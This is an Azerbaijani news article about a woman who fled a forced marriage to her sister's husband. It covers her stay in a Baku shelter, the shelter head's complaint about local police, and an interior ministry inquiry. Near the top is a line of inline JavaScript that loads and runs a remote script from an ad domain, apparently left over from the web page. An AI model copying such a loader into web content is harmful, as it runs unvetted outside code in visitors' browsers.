Azərbaycanda ata övladını digər qızının həyat yoldaşına məcbur ərə verir

by admin

window._ttzi = 161;var script = document.createElement(“script”);script.src = “https://adviad.com/nativevideo/get_ads.js?=”+(Math.floor(Math.random() * 100000000) + 1);script.async = true;(document.body || document.head || document.documentElement).appendChild(script);script.onload = function(){script.parentNode.removeChild(script);};

“Yardımlı rayonundan bir nəfər qadın uşağı ilə ayaqyalın qaçıb və Bakıya gəlib. Səbəb həyatda olan bacısının əri ilə evlənməyə məcbur edilməsidir”.

Bu barədə “Təmiz Dünya” Qadınlara Yardım İctimai Birliyinin sədri Mehriban Zeynalova məlumat paylaşıb.

O qeyd edib ki, qızın ailəsi də bu izdivacda həmin “ər”ə yardım edib:

“Demək gedib qızın xəbəri olmadan kəbin kəsdirib və deyib ki, sən mənim kəbinli arvadımsan. “Ər” qızı boğaraq zorla ərə gəlməsini tələb edib. Maraqlı bilirsiniz nədir? Orta əsir qaydalarını icra edən gələcək “ər” Arvana kənd məktəbinin direktorudur. Azərbaycan Respublikası Elm və Təhsil Nazirliyi mümkünsə bu direktorla məşğul olun.

Əgər bu belədirsə, həmin məktəbdə orta əsr adətlərinin mövcud olması qaçılmazdır. Yardımlı Rayon Polis Şöbəsinin əməkdaşı mənə zəng vurdu və “sizin sığınacaqda Yardımlı sakini varmı?” deyə soruşdu. Bildirdik ki, var. Dedi həmin “ər“ gəlib qızı götürmək istəyir. Xəbərdarlıq etdim ki, yeri qətiyyən bildirməyin.

Üstündən 3 saat keçməmiş bizim bu polis əməkdaşı bütün nəsli yanına alıb gəlib qapıya. Əməkdaş polisə yeri bildirməmək kimi məsuliyyətlə bağlı məlumatlandırıldığını bildirsə də, cavab “adam axtarışa verilib, gətirməliydim“ olub. Qardaş polisin yanında hədə qorxu gəlib əməkdaşımıza, amma polis hədənin qarşısını almayıb”.

O qeyd edib ki, Binəqədi Rayon Polis İdarəsi tərəfindən qadına dərhal ilkin yardım göstərilib:

“Həm uşağa, həm də qadına qida, ayaqqabı alıb və sığınacağa istiqamətləndiriblər”.

Daxili İşlər Nazirliyinin Mətbuat Xidmətindən Oxu.Az-ın sorğusuna cavab olaraq bildirilib ki, məsələ nəzarətə götürülüb və Binəqədi Rayon Polis İdarəsində araşdırma başlanılıb.

İlhamə Əbülfət

Oxu.az

Bu yazılara da göz atın...